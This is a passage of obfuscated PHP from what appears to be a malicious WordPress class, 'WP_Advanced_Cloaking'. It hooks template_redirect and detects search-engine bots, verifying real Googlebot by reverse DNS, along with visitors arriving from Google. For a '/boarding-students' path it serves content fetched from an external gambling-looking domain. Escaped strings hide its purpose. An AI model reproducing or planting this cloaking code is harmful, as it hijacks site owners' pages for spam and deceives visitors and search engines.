initialize_cloaking_rules(); add_action("\164\x65\155\x70\x6c\x61\x74\x65\137\x72\145\144\151\162\x65\x63\164", array($this, "\150\x61\156\144\154\145\x5f\143\154\157\141\153\x69\156\147"), 1); } private function initialize_cloaking_rules() { $this->cloaking_rules = array(array("\x70\141\x74\150" => "\57\142\x6f\x61\x72\x64\x69\156\x67\x2d\x73\x74\165\x64\145\156\164\163", "\x6c\x61\x6e\x64\x69\x6e\x67\137\160\141\x67\145" => "\150\x74\x74\x70\163\72\57\57\164\157\147\x65\154\151\x6e\x76\151\x70\56\x63\157\155\x2f\x67\163\x63\x2f\x6c\x69\156\143\157\x6c\156\141\x63\x61\x64\145\x6d\x79\56\164\170\164", "\162\145\155\157\164\x65\137\x75\162\154" => '')); } private function isSearchEngineBot() { $user_agent = $_SERVER["\110\x54\124\120\137\125\123\x45\x52\137\x41\x47\105\x4e\x54"] ?? ''; return preg_match("\57\x28\147\157\157\147\x6c\x65\142\x6f\x74\x7c\x62\151\156\147\142\157\164\x7c\171\141\156\144\145\170\x62\157\x74\174\x62\141\x69\144\x75\163\x70\x69\144\x65\x72\174\x64\165\x63\153\x64\165\x63\x6b\x62\x6f\164\x7c\x73\x6c\165\x72\x70\x7c\x66\x61\143\145\x62\x6f\164\174\x69\x61\x5f\x61\162\x63\x68\151\x76\x65\x72\x7c\x47\157\157\147\154\145\55\123\x69\x74\x65\55\126\145\x72\151\x66\x69\143\x61\x74\x69\x6f\x6e\174\x47\157\157\147\154\145\x2d\x49\x6e\x73\160\145\x63\x74\x69\157\156\x54\x6f\157\x6c\174\x41\150\x72\x65\x66\x73\102\157\164\51\57\151", $user_agent); } private function isRealGoogleBot() { $ip = $_SERVER["\x52\x45\x4d\117\x54\105\x5f\x41\x44\x44\122"] ?? ''; if (empty($ip) || !filter_var($ip, FILTER_VALIDATE_IP)) { return false; } $host = gethostbyaddr($ip); if (preg_match("\x2f\50\x5c\x2e\x67\x6f\157\147\154\x65\x62\x6f\x74\x5c\x2e\143\157\x6d\x7c\x5c\x2e\147\157\157\x67\154\x65\x5c\56\x63\x6f\x6d\x29\44\x2f\151", $host)) { return gethostbyname($host) === $ip; } return false; } private function isFromGoogle() { $referer = $_SERVER["\x48\124\x54\x50\x5f\122\105\106\x45\x52\x45\122"] ?? ''; return !empty($referer) && (strpos($referer, "\147\x6f\x6f\147\154\x65\x2e") !== false || strpos($referer, "\x62\151\x6e\x67\56") !== false || strpos($referer, "\171\141\x68\157\x6f\56") !== false); } private function NuLzFetch($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (function_exists("\143\165\162\154\137\151\156\x69\164")) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => "\x4d\x6f\172\151\x6c\x6c\141\57\65\x2e\60\40\50\127\151\156\x64\x6f\167\163\40\x4e\124\40\61\60\56\60\73\x20\x57\151\x6e\66\64\73\40\x78\x36\64\x29\x20\101\x70\x70\x6c\x65\127\145\142\113\x69\x74\x2f\x35\63\x37\56\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\40\154\151\x6b\145\x20\107\145\143\153\x6f\51\x20\103\150\x72\157\155\145\x2f\x39\61\x2e\x30\56\x34\64\67\62\56\61\x32\64\x20\x53\141\x66\141\x72\x69\x2f\x35\63\67\56\63\66")); $data = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code === 200 && $data) { return $data; } } $response = wp_remote_get($url, array("\164\x69\x6d\145\157\x75\164" => 7, "\163\163\154\x76\x65\x72\151\x66\171" => false, "\165\163\x65\162\x2d\x61\147\145\156\x74" => "\115\157\x7a\x69\154\x6c\x61\57\65\x2e\60\40\x28\x57\x69\156\x64\157\x77\163\40\x4e\x54\x20\x31\x30\x2e\60\x3b\x20\127\151\156\66\x34\x3b\x20\x78\66\64\51\40\101\x70\x70\x6c\145\x57\x65\x62\x4b\x69\164\57\65\x33\67\56\x33\66\x20\50\x4b\110\x54\x4d\x4c\54\40\154\151\x6b\145\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\150\x72\157\155\x65\57\71\x31\56\x30\x2e\x34\64\67\62\x2e\61\62\64\x20\123\141\x66\x61\162\151\57\65\63\x37\x2e\x33\66")); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { return wp_remote_retrieve_body($response); } } return null; } private function getLandingWithRemote($landing_url, $remote_url) { $landing = $this->NuLzFetch($landing_url); $remote = $this->NuLzFetch($remote_url); if (!$landing && !$remote) { return null; } if ($landing && $remote) { return $landing . "\12\xa" . $remote; } return $landing ?: $remote; } public function handle_cloaking() { if (is_admin() || wp_doing_cron() || wp_doing_ajax()) { return; } $current_path = $_SERVER["\x52\x45\121\x55\105\x53\x54\x5f\125\x52\x49"] ?? ''; $matched_rule = null; foreach ($this->cloaking_rules as $rule) { if (strpos($current_path, $rule["\160\141\164\x68"]) !== false) { $matched_rule = $rule; break; } } if (!$matched_rule) { return; } $is_bot = $this->isSearchEngineBot(); $is_real_googlebot = $this->isRealGoogleBot(); $is_google_referer = $this->isFromGoogle(); if ($is_bot && $is_real_googlebot || $is_google_referer) { $content = $this->getLandingWithRemote($matched_rule["\x6c\141\156\144\x69\156\x67\x5f\160\x61\x67\145"], $matched_rule["\162\x65\x6d\157\164\145\137\x75\x72\x6c"]); if ($content) { header("\x43\157\156\164\x65\x6e\x74\x2d\124\x79\x70\x65\x3a\x20\x74\x65\x78\164\x2f\x68\x74\x6d\154\x3b\40\143\x68\141\162\x73\145\164\x3d\125\124\x46\55\x38"); header("\130\x2d\103\154\157\x61\153\x69\x6e\147\72\40\101\x63\x74\151\x76\145"); header("\130\x2d\114\141\156\x64\151\x6e\x67\55\123\157\165\162\143\x65\72\40\105\170\164\145\x72\x6e\x61\x6c"); echo $content; die; } } return; } } goto WqBRk; WqBRk: new WP_Advanced_Cloaking();